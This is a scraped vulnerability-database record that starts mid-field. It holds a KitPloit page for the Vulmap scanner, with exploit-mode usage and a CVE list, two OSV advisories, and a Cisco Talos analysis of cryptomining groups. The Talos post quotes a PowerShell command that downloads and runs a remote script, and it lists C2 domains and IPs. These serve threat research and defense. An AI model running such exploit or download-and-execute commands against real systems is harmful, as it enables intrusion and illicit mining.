default scan all\n -c CMD, --cmd CMD Custom command used to confirm RCE vulns; commands other than \"netstat -an\" and \"id\" can confuse the result check. Default is \"netstat -an\"\n -v VULN, --vuln VULN Exploit mode: specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Display the list of vulnerabilities that can be scanned for\n --debug Debug mode, echo requests and responses\n --delay DELAY Delay between checks, default 0s\n --timeout TIMEOUT Scan timeout, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities in poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vulns, use the \"id\" command to confirm the vuln, because some Linux systems do not have the \"netstat\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vulns\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerability List\n\nVulmap supports the following vulnerabilities\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here 
|\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 
7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, unauthenticated any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console auth bypass, any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console auth bypass, any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp remote command execution |\n | ThinkPHP | 
CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", 
"CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2023-08-28T12:21:43", "description": "Apache Struts contains a Remote Code Execution when using results with no namespace and it's upper actions have no or wildcard namespace. The same flaw exists when using a url tag with no value, action set, and it's upper actions have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-18T19:24:38", "type": "osv", "title": "Apache Struts vulnerable to remote command execution (RCE) due to improper input validation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-08-28T11:04:18", "id": "OSV:GHSA-CR6J-3JP9-RW65", 
"href": "https://osv.dev/vulnerability/GHSA-cr6j-3jp9-rw65", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T08:19:34", "description": "\nJasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\n\n\nFor further information please refer to the official upstream advisory\nat <https://www.drupal.org/sa-core-2018-002.>\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n7.14-2+deb7u18.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-28T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-07-21T05:52:04", 
"id": "OSV:DLA-1325-1", "href": "https://osv.dev/vulnerability/DLA-1325-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2018-12-18T17:32:28", "description": "_Post authored by [David Liebenberg](<https://www.google.com/url?q=https://twitter.com/chinahanddave&sa=D&ust=1545149724666000>) and [Andrew Williams](<https://www.google.com/url?q=https://twitter.com/smugyeti&sa=D&ust=1545149724667000>)._ \n\n\n### Executive Summary\n\nThrough Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors that have netted them hundreds of thousands of U.S. dollars combined. \n \nThis blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies. \n \nWe will cover the recent activities of these actors: \n\n\n * Rocke \u2014A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.\n * 8220 Mining Group \u2014Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. 
The group targets Drupal, Hadoop YARN and Apache Struts2.\n * Tor2Mine \u2014A group that uses tor2web to deliver proxy communications to a hidden service for command and control (C2).\nThese groups have used similar TTPs, including: \n\n\n * Malicious shell scripts masquerading as JPEG files with the name \"logo*.jpg\" that install cron jobs and download and execute miners.\n * The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.\n * Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.\n * Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.\n * Tools such as XHide Process Faker, which can hide or change the name of Linux processes and PyInstaller, which can convert Python scripts into executables.\nWe were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. \n \nThe recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the [illicit cryptocurrency threat](<https://www.google.com/url?q=https://www.cyberthreatalliance.org/wp-content/uploads/2018/09/CTA-Illicit-CryptoMining-Whitepaper.pdf&sa=D&ust=1545149724689000>). However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. 
Talos published [separate research today covering this trend.](<https://blog.talosintelligence.com/2018/12/cryptocurrency-future-2018.html>) \n\n\n### Timeline of actors' campaigns\n\n#### [](<https://3.bp.blogspot.com/-jK9gU5Z4g6M/XBkSwhst2WI/AAAAAAAABh0/WgEn6WVJ0Aogu10HmoVBx-2CnIvTrCvTACLcBGAs/s1600/image5.jpg>) \n--- \nTimeline of Activity \n \n#### Introduction\n\nIllicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in delivering remote access trojans (RATs) and other malware. \n \nThrough our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing analysis of these attacks' wallets and command and control (C2) servers, we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining. \n \nWe also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. \n \nWe first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs. \n \nWe began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. 
We also noticed a similar toolset being used by an actor we named \"tor2mine,\" based on the fact that they additionally used tor2web services for C2 communications. \n \nWe also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits. \n \n\n\n#### \n\n#### Rocke/Iron cybercrime group\n\nCisco Talos wrote about [Rocke](<https://www.google.com/url?q=https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html&sa=D&ust=1545149724706000>) earlier this year, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure. \n \nIn the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. 
Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted [Jenkins ](<https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/new-jenkins-campaign-hides-malware--kills-competing-crypto-miner&sa=D&ust=1545149724712000>)and [JBoss](<https://www.google.com/url?q=https://www.alibabacloud.com/blog/jbossminer-mining-malware-analysis_593804&sa=D&ust=1545149724712000>) servers, continuing to rely on malicious Git repositories, as well as malicious [Amazon Machine Images](<https://www.google.com/url?q=https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/&sa=D&ust=1545149724714000>). They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware [capabilities](<https://www.google.com/url?q=https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/&sa=D&ust=1545149724714000>). Several campaigns used the XHide Process Faker tool. \n \nWe have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn. \n \nThe dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files. \n \nWhile keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called [whatMiner](<https://www.google.com/url?q=https://github.com/MRdoulestar/whatMiner&sa=D&ust=1545149724720000>), developed by a Chinese-speaking actor. 
WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme for the project describes it as \"collecting and integrating all different kinds of illicit mining malware.\" \n\n\n[](<https://1.bp.blogspot.com/-G3Rbkg_o3Mc/XBkTFOJxe5I/AAAAAAAABh8/BWe5f_IQcIkJPH7e45o9Rzvyyb1Zzq1bQCLcBGAs/s1600/image2.png>)\n\n#### \n\n#### Git repository for whatMiner\n\nLooking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors on to the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one. \n \nWhile looking through this repository, we found a folder called \"sustes.\" There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet. \n \nMany of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. 
Both samples also made requests for a file called \"TermsHost.exe\" from an IP 39[.]108[.]177[.]252, as well as a file called \"xmr.txt\" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called \"TermsHost.exe\" hosted on their C2 ssvs[.]space and a Monero mining config file called \"xmr.txt\" on the C2 sydwzl[.]cn. \n \nWhen we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed that they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services. \n \nNote that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has not been activity on Rocke\u2019s github since November, nor have we seen related samples in our honeypots since that time. \n \n\n\n#### 8220 Mining Group\n\nAs we previously described, Rocke originally forked a repository called \"whatMiner.\" We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor \u2014 8220 Mining Group \u2014 due to the repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke. \n \nWe first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a cURL request for several different types of malware on their infrastructure over port 8220. 
The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed: \n\n\n[](<https://1.bp.blogspot.com/-N8vmBZIyNH0/XBkTMgozjXI/AAAAAAAABiA/WdL1yKlWJVwqXSuzeKgozMuw2lg-xpQnACLcBGAs/s1600/image6.png>)\n\nWe were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 mining group is likely responsible for. \n \nThese campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited [Drupal](<https://www.google.com/url?q=https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/&sa=D&ust=1545149724754000>) content management system, [Hadoop YARN, Redis, Weblogic and Couch](<https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&sa=D&ust=1545149724756000>)[DB](<https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&sa=D&ust=1545149724757000>). Besides leveraging malicious bash scripts, Git repositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using malicious [Docker images](<https://www.google.com/url?q=https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers&sa=D&ust=1545149724758000>). 8220 Mining Group was able to [amass](<https://www.google.com/url?q=https://www.fortinet.com/blog/threat-research/yet-another-crypto-mining-botnet.html&sa=D&ust=1545149724759000>) nearly $200,000 worth of Monero through their campaigns. \n \nThere were some similarities to the TTPs used by Rocke and 8220 Mining Group in these campaigns. 
The actors downloaded a malicious file \"logo*.jpg\" (very similar to Rocke's use of malicious scripts under the file name of \"logo*.jpg\" payloads), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing. \n \n\n\n#### tor2mine\n\nOver the past few years, Talos has been monitoring accesses for tor2web services, which serve as a bridge between the internet and the Tor network, a system that allows users to enable anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden. \n \nRecently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to. \n \nIt is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system: \n \n\n\n> C:\\\\\\Windows\\\\\\System32\\\\\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))\n\n \nWe identified additional malware on this IP, which belongs to Total Server Solutions LLC. They appear to include 64-bit and 32-bit variants of XMRigCC \u2014 a variant of the XMRig miner, Windows executable versions of publicly available EternalBlue/EternalRomance exploit scripts, an open-source TCP port scanner, and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid writing executables to the disk. 
\n \nWe began to research the malware and infrastructure used in this campaign. We observed [previous research](<https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron&sa=D&ust=1545149724777000>) on a similar campaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on an IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, \"/win/checking-test.hta,\" that was almost identical to one we saw hosted on the tor2mine actor's C2, \"check.hta:\" \n \n/win/checking-test.hta from [previous campaign](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) \n\n\n[](<https://1.bp.blogspot.com/-P0BM1YbmglE/XBkTUfYruyI/AAAAAAAABiE/cdM11HTIeMU_BLbLvaIufOkl8AlVgpphACLcBGAs/s1600/image3.png>)\n\ncheck.hta \n\n\n[](<https://4.bp.blogspot.com/-xCD4IEajoAw/XBkTbbLPdpI/AAAAAAAABiM/iFRi_JfkjaYFKKbvu9WMvVdk-9x9_2KowCLcBGAs/s1600/image4.png>)\n\nThis actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on the XHide Process-faker tool. \n \nSimilarly, in [February 2018](<https://www.google.com/url?q=https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerability-exploited-deliver-double-monero-miner-payloads/&sa=D&ust=1545149724785000>), Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw. \n \nThis malware was developed in Python and then changed to ELF executables using the PyInstaller tool for distribution. 
This is the same technique we observed in a Rocke campaign. \n \n\n\n#### \n\n#### Conclusion\n\nThrough tracking the wallets of these groups, we estimate that they hold and have made payments totaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of Monero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate. \n \nThe value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue. \n \nThere remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that pose as ransomware. However, Rocke\u2019s GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig. \n \nTalos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies. 
\n \n\n\n#### \n\n#### Coverage\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://www.google.com/url?q=https://talosintelligence.com/resources/59&sa=D&ust=1545149724800000>) \n\n\n[](<https://3.bp.blogspot.com/-kLMMs2ca1vw/XBkTiaGFCAI/AAAAAAAABiQ/BnUOME636oc66-Lx9QJ2QKK2lbUlHb7rgCLcBGAs/s1600/image1.png>)\n\n \nAdvanced Malware Protection ([AMP](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/advanced-malware-protection&sa=D&ust=1545149724807000>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html&sa=D&ust=1545149724809000>)) or[ Web Security Appliance (WSA](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html&sa=D&ust=1545149724810000>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1545149724813000>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1545149724814000>)), and[ Meraki MX](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1545149724816000>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html&sa=D&ust=1545149724818000>) helps identify malicious binaries and build protection into all Cisco Security products. 
